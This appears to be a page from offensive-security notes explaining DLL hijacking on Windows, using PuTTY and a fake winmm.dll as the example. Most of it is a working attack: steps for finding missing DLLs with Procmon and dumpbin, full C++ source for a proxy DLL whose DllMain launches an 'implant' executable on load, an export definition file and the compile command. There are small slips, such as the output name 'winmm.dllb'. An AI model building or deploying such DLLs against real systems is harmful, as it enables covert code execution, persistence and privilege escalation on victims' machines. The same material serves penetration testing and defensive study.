DLL Hijacking

Procmon:

open procmon (sysinternals) and filter for 'not found'.

once a DLL to inject has been found, identify what we need to implement, run:

dumpbin  /imports PATH

From the dumpbin check for the DLL you are looking to inject, for this example we will use 'winmm.dll', and hijack PUTTY.exe. google the results and check for information about the libraries e.g PlaySoundA:

BOOL PlaySound(
   LPCTSTR pszSound,
   HMODULE hmod,
   DWORD   fdwSound
);

Open a debugger to see what the app is doing with the lib injection (in the arch of the exe) and search for the library identified in the DLL. Once found, jump through the identified library calls to check what is does. Using the above example, this should show similar:

PlaySoundA (dword, dword, dword)

then create the following dll (with updated code from your binary):

winmm.def:

LIBRARY "WinMM"
EXPORTS
  PlaySoundA

winmm.dll:

#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;

    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
        CreateProcess(
					"c:\\implant\\implant.exe", 
					"", NULL, NULL, TRUE, 0, NULL, NULL, 
					&info, &processInfo);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

extern "C" {
	 __declspec(dllexport) BOOL WINAPI PlaySoundA(
											LPCSTR pszSound,
											HMODULE hmod,
											DWORD fdwSound) {
		 return TRUE;
		}
}

and compile using:

@ECHO OFF

cl.exe /W0 /D_USRDLL /D_WINDLL winmm.cpp winmm.def /MT /link /DLL /OUT:winmm.dllb

(making sure that you are in the correct ARCH)

Place the DLL into the hijacking pass and should be a hit

PreviousMisconfigured Reg NextPrivilege enumeration

Last updated 2 years ago